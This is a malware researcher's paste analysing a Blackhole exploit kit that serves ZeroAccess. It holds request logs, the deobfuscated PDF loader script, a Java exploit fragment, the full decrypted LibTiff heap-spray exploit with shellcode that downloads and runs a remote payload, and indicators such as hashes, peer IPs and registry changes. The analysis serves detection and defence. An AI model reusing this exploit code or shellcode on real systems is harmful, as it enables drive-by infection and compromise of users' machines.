SHARE
TWEET

#MalwareMustDie - BHEK "/closest/" w/ ZeroAccess pload

MalwareMustDie Feb 6th, 2013 384 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // MalwareMustDie! @unixfreaxjp /malware]$ date
  2. // Wed Feb  6 19:57:29 JST 2013
  3. // Mission: Wacking Blackhole "/closest/" version with ZeroAccess payload
  4.  
  5. DETAILS:
  6. ===========
  7.  
  8. //Blackhole "/closest/" version, landing page url:
  9.  
  10. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
  11.  
  12. // grab..
  13.  
  14. --2013-02-06 18:32:38--  h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php
  15. Resolving 3thtyjtyjcc.ns02.us... seconds 0.00, 89.253.232.149
  16. Caching 3thtyjtyjcc.ns02.us => 89.253.232.149
  17. Connecting to 3thtyjtyjcc.ns02.us|89.253.232.149|:80... seconds 0.00, connected.
  18.   :
  19. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0
  20. Referer: http://malwaremusrdie.blogspot.com
  21. User-Agent: MMD Special Wacking Browser
  22. Accept: All moronz made malwares
  23. Host: 3thtyjtyjcc.ns02.us
  24. Connection: I Keep-Alive, Malware Dies!
  25. Accept-Language: Any lang that can curse Malware Moronz!
  26. Accept-Charset: All moronz made charsets
  27.   :
  28. HTTP request sent, awaiting response...
  29.   :
  30. HTTP/1.1 200 OK
  31. Server: nginx/1.2.6
  32. Date: Wed, 06 Feb 2013 09:32:37 GMT
  33. Content-Type: text/html
  34. Connection: close
  35. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  36. Vary: Accept-Encoding
  37.   :
  38. 200 OK
  39. Length: unspecified [text/html]
  40. Saving to: `209tuj2dsljdglsgjwrigslgkjskga.php'
  41. 2013-02-06 18:32:42 (82.7 KB/s) - `209tuj2dsljdglsgjwrigslgkjskga.php' saved [110246]
  42.  
  43. ====================================================================
  44.  
  45. // same ol' plugindetect 079...here: http://pastebin.com/raw.php?i=FnaCGu5J
  46. // only PDF infector was weaponized this time;
  47.  
  48. function p1(){
  49.   var d = document.createElement("object");
  50.   d.setAttribute("data", "/closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=" + x("c833f")
  51.    + "&ecbodyd=" + x("kxg") + "&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=" + x(pdfver.join(
  52.   ".")));
  53.   d.setAttribute("type", "application/pdf");
  54.   document.body.appendChild(d);
  55. }
  56. function p2(){
  57.   var d = document.createElement("object");
  58.   d.setAttribute("data", "/closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=" + x(
  59.   "c833f") + "&iiuhc=" + x("l") + "&etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=" + x(
  60.   pdfver.join(".")));
  61.   d.setAttribute("type", "application/pdf");
  62.   document.body.appendChild(d);}
  63.  
  64. ==========MY CRACK LOGIC / YOU CAN USE AS GUIDE!!!==================
  65.  
  66. function x(s){
  67.   d = [];
  68.   for (i = 0; i < s.length; i ++ ){
  69.     k = (s.charCodeAt(i)).toString(33);
  70.     d.push(k);
  71.   }
  72.   ;
  73.   return d.join(":");
  74. }
  75.  
  76. var domain="http://3thtyjtyjcc.ns02.us";
  77. var pdf ="1k:1d:1f:1d:1g:1d:1f";
  78. var string1 ="/closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=" + x("c833f") + "&ecbodyd=" + x("kxg") + "&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=";
  79. var string2 ="/closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=" + x("c833f") + "&iiuhc=" + x("l") + "&etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=";
  80. var url1 = domain + string1 + pdf; var url2 = domain + string2 + pdf;
  81. document.write(url1 + "\n" + url2);
  82.  
  83. ===============================================
  84. // got the two's PDF urls:
  85.  
  86. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=30:1n:1i:1i:33&ecbodyd=38:3l:34&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=1k:1d:1f:1d:1g:1d:1f
  87.  
  88. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=30:1n:1i:1i:33&iiuhc=39&etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=1k:1d:1f:1d:1g:1d:1f
  89.  
  90. // fetch! fetch! fetch! fetch! fetch!
  91.  
  92. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?xdibj=30:1n:1i:1i:33&ecbodyd=38:
  93. 3l:34&sjcr=30:33:1n:1m:1h:33:30:1o:30:1h&kww=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  94. Referer: http://malwaremusrdie.blogspot.com
  95. User-Agent: MMD Special Wacking Browser
  96. Accept: All moronz made malwares
  97. Host: 3thtyjtyjcc.ns02.us
  98. Connection: I Keep-Alive, Malware Dies!
  99. Accept-Language: Any lang that can curse Malware Moronz!
  100. Accept-Charset: All moronz made charsets
  101.   :
  102. HTTP request sent, awaiting response...
  103.   :
  104. HTTP/1.1 200 OK
  105. Server: nginx/1.2.6
  106. Date: Wed, 06 Feb 2013 09:43:07 GMT
  107. Content-Type: application/pdf
  108. Content-Length: 20197
  109. Connection: I Keep-Alive, Malware Dies!
  110. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  111. ETag: "c0fe4b4e812db9d2d0db61922e0522ea"
  112. Last-Modified: Wed, 06 Feb 2013 09:43:13 GMT
  113. Accept-Ranges: bytes
  114.   :
  115. 200 OK
  116. Registered socket 1892 for persistent reuse.
  117. Length: 20197 (20K) [application/pdf]
  118. Saving to: `infector1.pdf'
  119. 100%[======================================>] 20,197      53.4K/s   in 0.4s
  120. 2013-02-06 18:43:10 (53.4 KB/s) - `infector1.pdf' saved [20197/20197]
  121.  
  122.  
  123. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?ycfxjsu=30:1n:1i:1i:33&iiuhc=39&
  124. etyxhy=30:33:1n:1m:1h:33:30:1o:30:1h&dwimohi=1k:1d:1f:1d:1g:1d:1f HTTP/1.0
  125. Referer: http://malwaremusrdie.blogspot.com
  126. User-Agent: MMD Special Wacking Browser
  127. Accept: All moronz made malwares
  128. Host: 3thtyjtyjcc.ns02.us
  129. Connection: I Keep-Alive, Malware Dies!
  130. Accept-Language: Any lang that can curse Malware Moronz!
  131. Accept-Charset: All moronz made charsets
  132.   :
  133. HTTP request sent, awaiting response...
  134.   :
  135. HTTP/1.1 200 OK
  136. Server: nginx/1.2.6
  137. Date: Wed, 06 Feb 2013 09:43:47 GMT
  138. Content-Type: application/pdf
  139. Content-Length: 11596
  140. Connection: I Keep-Alive, Malware Dies!
  141. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  142. Accept-Ranges: bytes
  143. Content-Disposition: inline; filename=0a08d.pdf
  144.   :
  145. 200 OK
  146. Registered socket 1892 for persistent reuse.
  147. Length: 11596 (11K) [application/pdf]
  148. Saving to: `infector2.pdf'
  149. 100%[======================================>] 11,596      --.-K/s   in 0.05s
  150. 2013-02-06 18:43:50 (221 KB/s) - `infector2.pdf' saved [11596/11596]
  151.  
  152. // check purpose... the JARS... got two.
  153.  
  154. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0
  155. Referer: http://malwaremusrdie.blogspot.com
  156. User-Agent: MMD Special Wacking Browser Java/1.7.0_11
  157. Accept: All moronz made malwares
  158. Host: 3thtyjtyjcc.ns02.us
  159. Connection: I Keep-Alive, Malware Dies!
  160. Accept-Language: Any lang that can curse Malware Moronz!
  161. Accept-Charset: All moronz made charsets
  162.   :
  163. HTTP request sent, awaiting response...
  164.   :
  165. HTTP/1.1 200 OK
  166. Server: nginx/1.2.6
  167. Date: Wed, 06 Feb 2013 09:48:35 GMT
  168. Content-Type: application/java-archive
  169. Content-Length: 26127
  170. Connection: I Keep-Alive, Malware Dies!
  171. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  172. ETag: "fa7484b3de49e3dbbb5a1f3a51ae2a76"
  173. Last-Modified: Wed, 06 Feb 2013 09:48:41 GMT
  174. Accept-Ranges: bytes
  175.   :
  176. 200 OK
  177. Registered socket 1892 for persistent reuse.
  178. Length: 26127 (26K) [application/java-archive]
  179. Saving to: `java1.jar'
  180. 100%[======================================>] 26,127      67.5K/s   in 0.4s
  181. 2013-02-06 18:48:38 (67.5 KB/s) - `java1.jar' saved [26127/26127]
  182.  
  183.  
  184. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php HTTP/1.0
  185. Referer: http://malwaremusrdie.blogspot.com
  186. User-Agent: MMD Special Wacking Browser Java/1.6.0_20
  187. Accept: All moronz made malwares
  188. Host: 3thtyjtyjcc.ns02.us
  189. Connection: I Keep-Alive, Malware Dies!
  190. Accept-Language: Any lang that can curse Malware Moronz!
  191. Accept-Charset: All moronz made charsets
  192.  
  193.   :
  194. HTTP request sent, awaiting response...
  195.   :
  196. HTTP/1.1 200 OK
  197. Server: nginx/1.2.6
  198. Date: Wed, 06 Feb 2013 09:49:01 GMT
  199. Content-Type: application/java-archive
  200. Content-Length: 16640
  201. Connection: I Keep-Alive, Malware Dies!
  202. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  203. ETag: "ba85a3efd20c73021b3680feeec19503"
  204. Last-Modified: Wed, 06 Feb 2013 09:49:07 GMT
  205. Accept-Ranges: bytes
  206.   :
  207. 200 OK
  208. Registered socket 1892 for persistent reuse.
  209. Length: 16640 (16K) [application/java-archive]
  210. Saving to: `java2.jar'
  211. 2013-02-06 18:49:05 (49.9 KB/s) - `java2.jar' saved [16640/16640]
  212.  
  213.  
  214. // JAR report...
  215.  
  216. java1.jar = java 7u10 0day...
  217.  
  218. interesting CVE fond in java2.jar at mac.class,
  219. It is CVE-2010-4476 with current status not released yet by MITRE.ORG (under review),
  220. and now being used by Blackhole EK to infect ZeroAccess in PDF exploits everywhere..
  221. But Oracle seems released the patch..
  222. Ref: http://www.oracle.com/technetwork/topics/security/alert-cve-2010-4476-305811.html
  223. Ref: http://packetstormsecurity.com/files/cve/CVE-2010-4476
  224. Ref: http://www.exploringbinary.com/java-hangs-when-converting-2-2250738585072012e-308/
  225.  
  226. Overview:
  227.  
  228. The Double.parseDouble w/ java.math.BigInteger method in Java Runtime Environment (JRE) in
  229. Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and
  230. 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows
  231. remote attackers to cause a denial of service via a crafted string that triggers an
  232. infinite loop of estimations during conversion to a double-precision binary floating-point
  233. number, as demonstrated using 2.2250738585072012e-308.
  234.  
  235.  
  236. // exploit...
  237.  
  238. import java.io.ByteArrayInputStream;
  239. import java.io.InputStream;
  240. import java.lang.reflect.Method;
  241. import java.math.BigInteger;
  242. import java.security.ProtectionDomain;
  243.      :
  244.   public static InputStream qwe(String c)
  245.   {
  246.     String s = "ACED0005";
  247.     return new ByteArrayInputStream(
  248.       hw.stb(
  249.       test.iar(new String[] {
  250.       s, q2, q3,
  251.       Integer.toHexString(c.length()),
  252.       String.format("%x", new Object[] { new BigInteger(c.getBytes()) }), test.en + zzzz, test.enn2 + test.enn22, test.en2, qqqq, test.hello, "672F4F626A6563743B787071007E0003" },
  253.       "")));  }
  254.  
  255.  
  256.  
  257. // Using the smallest PDF....
  258.  
  259. //cracked:
  260.  
  261. var padding;
  262. var bbb, ccc, ddd, eee, fff, ggg, hhh;
  263. var pointers_a, i;
  264. var x = new Array();
  265. var y = new Array();
  266. var _l1 = "                   // is a shellcode..
  267. 4c20600f0517804a3c20600f0f63804aa3eb804a3020824a6e2f804a4141414126000000000000000000000000
  268. 0000001239804a6420600f000400004141414141414141" + "
  269. 00008667b61766d697d3c61757664662e60767678797d3475747861667629613d3d64796d607962637628613a3
  270. 0333a3f613a30333a33333a38613a3d613a3e613a33333a30333d35626479687467757623333a39613a39613a3
  271. e613a30333d317e667f3078607e21676b637a6b676c63776962777a67637c67646a6c6374623a65747930323f2
  272. 47375637f6c636f23757e2230337e6e23636a69747a69747864733f2f2a30747478607f2a16397646cb1b5a8ac
  273. 33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c3840
  274. 65ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446c
  275. c6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c23332767404244
  276. 7c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f686
  277. 3eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b8
  278. 3fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e5
  279. 6e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b865
  280. 15c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c0
  281. 04b80304b8460c33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
  282. var _l2 = "
  283. 4c20600fa563804a3c20600f9621804a901f804a3090844a7d7e804a4141414126000000000000000000000000
  284. 0000007188804a6420600f000400004141414141414141" + "
  285. 00008667b61766d697d3c61757664662e60767678797d3475747861667629613d3d64796d607962637628613a3
  286. 0333a3f613a30333a33333a38613a3d613a3e613a33333a30333d35626479687467757623333a39613a39613a3
  287. e613a30333d317e667f3078607e21676b637a6b676c63776962777a67637c67646a6c6374623a65747930323f2
  288. 47375637f6c636f23757e2230337e6e23636a69747a69747864733f2f2a30747478607f2a16397646cb1b5a8ac
  289. 33db10f698e0a8ef89cee0e4e8ffffefc98e8065ffefa600a64c5700f30874af5700f3087431be20bec03c3840
  290. 65ff35c0be3800a64065ff3500a661570c584165ff00a6753500a600a6151440d1448803401ca8950090d1446c
  291. c6c646e250d1447c4726077700d1447c159c338eb8c065ff0000008f86350237d2028042447c23332767404244
  292. 7c3776562742407cc042c5d800001040ce1827be20beffffff168e8eb8804c3861ff45d6c62757860000e6f686
  293. 3eff503c3801e5b8ceb85505910c3805000000ff8604a60585000000008e9f2effffff898e9550a67fb88086b8
  294. 3fbe69304733c0d7080286b8da35be3c95e5ba5c30b840b8dd308db8c04245ffce64d8b4c0b866dd3042e5b8e5
  295. 6e57f1b31fbe04ad30d0bc1c80472f8301ebf0bd335c30dacf14949c335f300267b8655f30875347b8c357b865
  296. 15c4be9e15574e58424378bf576093643c0304b88bffff0151ee18c2334730c3e5b866bd338067b865c107b8c0
  297. 04b80304b8460c33f59e43574e58cfcf4e3866".split('').reverse().join('').replace(/;/g, '');
  298. _l3 = app;
  299. _l4 = new Array();
  300. function _l5(){
  301.   var _l6 = _l3.viewerVersion.toString();
  302.   _l6 = _l6.replace('.', '');
  303.   while (_l6.length < 4)_l6 += '0';
  304.   return parseInt(_l6, 10)
  305. }
  306. function _l7(_l8, _l9){
  307.   while (_l8.length * 2 < _l9)_l8 += _l8;
  308.   return _l8.substring(0, _l9 / 2)
  309. }
  310. function _I0(_I1){
  311.   _I1 = unescape(_I1);
  312.   roteDak = _I1.length * 2;
  313.   dakRote = unescape('%u9090');
  314.   spray = _l7(dakRote, 0x2000 - roteDak);
  315.   loxWhee = _I1 + spray;
  316.   loxWhee = _l7(loxWhee, 524098);
  317.   for (i = 0; i < 400; i ++ )_l4[i] = loxWhee.substr(0, loxWhee.length - 1) + dakRote;
  318. }
  319. function _I2(_I1, len){
  320.   while (_I1.length < len)_I1 += _I1;
  321.   return _I1.substring(0, len)
  322. }
  323. function _I3(_I1){
  324.   ret = '';
  325.   for (i = 0; i < _I1.length; i += 2){
  326.     b = _I1.substr(i, 2);
  327.     c = parseInt(b, 16);
  328.     ret += String.fromCharCode(c);
  329.   }
  330.   return ret
  331. }
  332. function _ji1(_I1, _I4){
  333.   _I5 = '';
  334.   for (_I6 = 0; _I6 < _I1.length; _I6 ++ ){
  335.     _l9 = _I4.length;
  336.     _I7 = _I1.charCodeAt(_I6);
  337.     _I8 = _I4.charCodeAt(_I6 % _l9);
  338.     _I5 += String.fromCharCode(_I7 ^ _I8);
  339.   }
  340.   return _I5
  341. }
  342. function _I9(_I6){
  343.   _j0 = _I6.toString(16);
  344.   _j1 = _j0.length;
  345.   _I5 = (_j1 % 2) ? '0' + _j0 : _j0;
  346.   return _I5
  347. }
  348. function _j2(_I1){
  349.   _I5 = '';
  350.   for (_I6 = 0; _I6 < _I1.length; _I6 += 2){
  351.     _I5 += '%u';
  352.     _I5 += _I9(_I1.charCodeAt(_I6 + 1));
  353.     _I5 += _I9(_I1.charCodeAt(_I6))
  354.   }
  355.   return _I5
  356. }
  357. function _j3(){   // same usage of LibTiff...
  358.   _j4 = _l5();
  359.   if (_j4 < 9000){ /<=========PDF VER...
  360.     _j5 = 'o+uASjgggkpuL4BK/////wAAAABAAAAAAAAAAAAQAAAAAAAAfhaASiAgYA98EIBK';
  361.     _j6 = _l1;
  362.     _j7 = _I3(_j6)
  363.   }
  364.   else {
  365.     _j5 = 'kB+ASjiQhEp9foBK/////wAAAABAAAAAAAAAAAAQAAAAAAAAYxCASiAgYA/fE4BK';
  366.     _j6 = _l2;
  367.     _j7 = _I3(_j6)
  368.   }
  369.   _j8 = 'SUkqADggAABB';
  370.   _j9 = _I2('QUFB', 10984);
  371.   _ll0 = '
  372. QQcAAAEDAAEAAAAwIAAAAQEDAAEAAAABAAAAAwEDAAEAAAABAAAABgEDAAEAAAABAAAAEQEEAAEAAAAIAAAAFwEEAA
  373. EAAAAwIAAAUAEDAMwAAACSIAAAAAAAAAAMDAj/////';
  374.   _ll1 = _j8 + _j9 + _ll0 + _j5;
  375.   _ll2 = _ji1(_j7, '');
  376.   if (_ll2.length % 2)_ll2 += unescape('%00');
  377.   _ll3 = _j2(_ll2);
  378.   with ({
  379.     k : _ll3
  380.   }
  381.   )_I0(k);
  382.   ImageField1.rawValue = _ll1
  383. }
  384. _j3();
  385.  
  386.  
  387. // shellcode looks bin hexbin-ascii...
  388.  
  389.  
  390. 4c 20 60 0f 05 17 80 4a  3c 20 60 0f 0f 63 80 4a  L.`....J<.`..c.J
  391. a3 eb 80 4a 30 20 82 4a  6e 2f 80 4a 41 41 41 41  ...J0..Jn/.JAAAA
  392. 26 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  &...............
  393. 12 39 80 4a 64 20 60 0f  00 04 00 00 41 41 41 41  .9.Jd.`.....AAAA
  394. 41 41 41 41 66 83 e4 fc  fc 85 e4 75 34 e9 5f 33  AAAAf......u4._3
  395. c0 64 8b 40 30 8b 40 0c  8b 70 1c 56 8b 76 08 33  .d.@0.@..p.V.v.3
  396. db 66 8b 5e 3c 03 74 33  2c 81 ee 15 10 ff ff b8  .f.^<.t3,.......
  397. 8b 40 30 c3 46 39 06 75  fb 87 34 24 85 e4 75 51  .@0.F9.u..4$..uQ
  398. e9 eb 4c 51 56 8b 75 3c  8b 74 35 78 03 f5 56 8b  ..LQV.u<.t5x..V.
  399. 76 20 03 f5 33 c9 49 41  fc ad 03 c5 33 db 0f be  v...3.IA....3...
  400. 10 38 f2 74 08 c1 cb 0d  03 da 40 eb f1 3b 1f 75  .8.t......@..;.u
  401. e6 5e 8b 5e 24 03 dd 66  8b 0c 4b 8d 46 ec ff 54  .^.^$..f..K.F..T
  402. 24 0c 8b d8 03 dd 8b 04  8b 03 c5 ab 5e 59 c3 eb  $...........^Y..
  403. 53 ad 8b 68 20 80 7d 0c  33 74 03 96 eb f3 8b 68  S..h..}.3t.....h
  404. 08 8b f7 6a 05 59 e8 98  ff ff ff e2 f9 e8 00 00  ...j.Y..........
  405. 00 00 58 50 6a 40 68 ff  00 00 00 50 83 c0 19 50  ..XPj@h....P...P
  406. 55 8b ec 8b 5e 10 83 c3  05 ff e3 68 6f 6e 00 00  U...^......hon..
  407. 68 75 72 6c 6d 54 ff 16  83 c4 08 8b e8 e8 61 ff  hurlmT........a.
  408. ff ff eb 02 eb 72 81 ec  04 01 00 00 8d 5c 24 0c  .....r.......\$.
  409. c7 04 24 72 65 67 73 c7  44 24 04 76 72 33 32 c7  ..$regs.D$.vr32.
  410. 44 24 08 20 2d 73 20 53  68 f8 00 00 00 ff 56 0c  D$..-s.Sh.....V.
  411. 8b e8 33 c9 51 c7 44 1d  00 77 70 62 74 c7 44 1d  ..3.Q.D..wpbt.D.
  412. 05 2e 64 6c 6c c6 44 1d  09 00 59 8a c1 04 30 88  ..dll.D...Y...0.
  413. 44 1d 04 41 51 6a 00 6a  00 53 57 6a 00 ff 56 14  D..AQj.j.SWj..V.
  414. 85 c0 75 16 6a 00 53 ff  56 04 6a 00 83 eb 0c 53  ..u.j.S.V.j....S
  415. ff 56 04 83 c3 0c eb 02  eb 13 47 80 3f 00 75 fa  .V........G.?.u.
  416. 47 80 3f 00 75 c4 6a 00  6a fe ff 56 08 e8 9c fe  G.?.u.j.j..V....
  417. ff ff 8e 4e 0e ec 98 fe  8a 0e 89 6f 01 bd 33 ca  ...N.......o..3.
  418. 8a 5b 1b c6 46 79 36 1a  2f 70 68 74 74 70 3a 2f  .[..Fy6./phttp:/
  419. 2f 33 74 68 74 79 6a 74  79 6a 63 63 2e 6e 73 30  /3thtyjtyjcc.ns0
  420. 32 2e 75 73 2f 63 6c 6f  73 65 73 74 2f 32 30 39  2.us/closest/209
  421. 74 75 6a 32 64 73 6c 6a  64 67 6c 73 67 6a 77 72  tuj2dsljdglsgjwr
  422. 69 67 73 6c 67 6b 6a 73  6b 67 61 2e 70 68 70 3f  igslgkjskga.php?
  423. 76 6e 71 3d 33 30 3a 31  6e 3a 31 69 3a 31 69 3a  vnq=30:1n:1i:1i:
  424. 33 33 26 75 77 64 78 69  74 62 65 3d 33 30 3a 33  33&uwdxitbe=30:3
  425. 33 3a 31 6e 3a 31 6d 3a  31 68 3a 33 33 3a 33 30  3:1n:1m:1h:33:30
  426. 3a 31 6f 3a 33 30 3a 31  68 26 73 62 69 70 6d 69  :1o:30:1h&sbipmi
  427. 74 6d 3d 31 69 26 76 61  68 74 75 74 3d 79 78 76  tm=1i&vahtut=yxv
  428. 76 70 6e 26 64 66 75 71  6c 3d 79 6d 66 71 6b 76  vpn&dfuql=ymfqkv
  429. 68 00 00 00                                       h...            
  430.  
  431.  
  432. Payload URL:
  433. h00p://3thtyjtyjcc.ns02.us/closest/209tuj2dsljdglsgjwrigslgkjskga.php?vnq=30:1n: 1i:1i:33&uwdxitbe=30:33:1n:1m:1h:33:30:1o:30:1h&sbipmitm=1i&vahtut=yxvvpn&dfuql=ymfqkvh
  434.  
  435.  
  436. ---request begin---
  437. GET /closest/209tuj2dsljdglsgjwrigslgkjskga.php?vnq=30:1n:%201i:1i:33&uwdxitbe=30:33:1n:1m:1h:33:30:1o:30:1h&sbipmitm=1i&vahtut=yxvvpn&dfuql=%20ymfqkvh HTTP/1.0
  438. Referer: http://malwaremusrdie.blogspot.com
  439. User-Agent: MMD Special Wacking Browser
  440. Accept: All moronz made malwares
  441. Host: 3thtyjtyjcc.ns02.us
  442. Connection: I Keep-Alive, Malware Dies!
  443. Accept-Language: Any lang that can curse Malware Moronz!
  444. Accept-Charset: All moronz made charsets
  445.   :
  446. HTTP request sent, awaiting response...
  447.   :
  448. HTTP/1.1 200 OK
  449. Server: nginx/1.2.6
  450. Date: Wed, 06 Feb 2013 10:11:48 GMT
  451. Content-Type: application/x-msdownload
  452. Content-Length: 167936
  453. Connection: I Keep-Alive, Malware Dies!
  454. X-Powered-By: PHP/5.3.10-1ubuntu3.4
  455. Pragma: public
  456. Expires: Wed, 06 Feb 2013 10:11:54 GMT
  457. Cache-Control: must-revalidate, post-check=0, pre-check=0
  458. Cache-Control: private
  459. Content-Disposition: attachment; filename="calc.exe"
  460. Content-Transfer-Encoding: binary
  461.   :
  462. 200 OK
  463. Registered socket 1892 for persistent reuse.
  464. Length: 167936 (164K) [application/x-msdownload]
  465. Saving to: `calc.exe'
  466. 2013-02-06 19:11:53 (84.4 KB/s) - `calc.exe' saved [167936/167936]
  467.  
  468. Sections:
  469.    .text 0x1000 0x10737 67584
  470.    .rdata 0x12000 0x3ec 1024
  471.    .data" 0x13000 0x18000 97792
  472.    .reloc 0x2b000 0x200 512
  473.  
  474. Entry Point at 0x1dfe
  475. Virtual Address is 0x4029fe
  476. 0000   4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00    MZ..............
  477. 0010   B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00    ........@.......
  478. 0020   00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00    ................
  479. 0030   00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00    ................
  480. 0040   0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68    ........!..L.!Th
  481. 0050   69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F    is program canno
  482. 0060   74 20 62 65 20 72 75 6E 20 69 6E 20 44 4F 53 20    t be run in DOS
  483. 0070   6D 6F 64 65 2E 0D 0D 0A 24 00 00 00 00 00 00 00    mode....$.......
  484. 0080   50 45 00 00 4C 01 04 00 9A 5D 59 40 00 00 00 00    PE..L....]Y@....
  485. 0090   00 00 00 00 E0 00 0E 83 0B 01 06 00 37 07 01 00    ............7...
  486.  
  487. Sample : ./calc.exe
  488. MD5    : 8f3f3be426c62710145252b8b031308d
  489. SHA256 : 9f9d664ed03fd46d38fb9c71e095fa857878240c94e5861d451856923f9e73c5
  490. URL    : https://www.virustotal.com/latest-scan/9f9d664ed03fd46d38fb9c71e095fa857878240c94e5861d451856923f9e73c5
  491.  
  492. Symantec                 : Suspicious.IRCBot
  493. ESET-NOD32               : a variant of Win32/Kryptik.ATSE
  494. Kaspersky                : HEUR:Trojan.Win32.Generic
  495. PCTools                  : HeurEngine.ZeroDayThreat
  496. McAfee                   : ZeroAccess.hr
  497. Malwarebytes             : Rootkit.0Access
  498. Fortinet                 : W32/ZAccess.BDGJ!tr.bdr
  499. Kingsoft                 : Win32.Troj.Undef.(kcloud)
  500. Microsoft                : VirTool:Win32/Obfuscator.XQ
  501.  
  502. ===============================
  503. // payload is zero access..,
  504. =============================
  505.  
  506. // see below networking:
  507.  
  508. // DNS...
  509.  
  510. 194.165.17.3:53
  511. 66.85.130.234:53
  512.  
  513. // MALFORM UDP...
  514.  
  515. 206.254.253.254:16464
  516. 190.254.253.254:16464
  517. 182.254.253.254:16464
  518. 180.254.253.254:16464
  519. 166.254.253.254:16464
  520. 135.254.253.254:16464
  521. 134.254.253.254:16464
  522. 119.254.253.254:16464
  523. 117.254.253.254:16464
  524. 115.254.253.254:16464
  525. 92.254.253.254:16464
  526. 88.254.253.254:16464
  527. 87.254.253.254:16464
  528. 71.254.253.254:16464
  529. 69.254.253.254:16464
  530. 46.150.37.29:16464
  531. 68.9.31.32:16464
  532. 69.133.27.61:16464
  533. 95.57.233.74:16464
  534. 94.210.172.145:16464
  535. 184.155.123.146:16464
  536. 194.165.17.3:123
  537. 91.242.217.247:123
  538. 75.95.95.148:16464
  539. 24.92.201.152:16464
  540. 222.254.253.254:16464
  541. 98.149.145.253:16464
  542. 66.65.129.254:16464
  543. 97.83.82.254:16464
  544. 190.190.239.72:16464
  545. 118.171.55.88:16464
  546. 14.97.157.71:16464
  547. 173.20.198.123:16464
  548. 24.186.214.38:16464
  549. 218.173.39.25:16464
  550. 116.193.142.246:16464
  551. 76.97.134.59:16464
  552. 68.204.131.69:16464
  553. 114.178.175.1:16464
  554. 118.171.44.79:16464
  555. 173.17.47.76:16464
  556. 123.143.96.27:16464
  557. 173.20.128.26:16464
  558. 90.94.246.250:16464
  559. 70.171.38.38:16464
  560. 79.136.67.28:16464
  561. 95.169.211.29:16464
  562. 87.111.189.32:16464
  563. 75.109.170.11:16464
  564. 97.89.4.235:16464
  565.  
  566. // See the registry deleted:
  567.  
  568. HKLM\System\CurrentControlSet\Services\SharedAccess\DependOnGroup      
  569. HKLM\System\CurrentControlSet\Services\SharedAccess\DependOnService "Netman"
  570. HKLM\System\CurrentControlSet\Services\SharedAccess\Description "Provides network address translation, addressing, name resolution and/or intrusion prevention services for a home or small office network."
  571. HKLM\System\CurrentControlSet\Services\SharedAccess\DisplayName "Windows Firewall/Internet Connection Sharing (ICS)"
  572. HKLM\System\CurrentControlSet\Services\SharedAccess\Enum\0 "Root\LEGACY_SHAREDACCESS\0000"
  573. HKLM\System\CurrentControlSet\Services\SharedAccess\Enum\Count
  574. HKLM\System\CurrentControlSet\Services\SharedAccess\Enum\NextInstance
  575. HKLM\System\CurrentControlSet\Services\SharedAccess\Epoch\Epoch
  576. HKLM\System\CurrentControlSet\Services\SharedAccess\ErrorControl
  577. HKLM\System\CurrentControlSet\Services\SharedAccess\ImagePath "%SystemRoot%\system32\svchost.exe -k netsvcs"
  578. HKLM\System\CurrentControlSet\Services\SharedAccess\ObjectName "LocalSystem"
  579. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List\%windir%\system32\sessmgr.exe   "%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
  580. HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%windir%\system32\sessmgr.exe "%windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019"
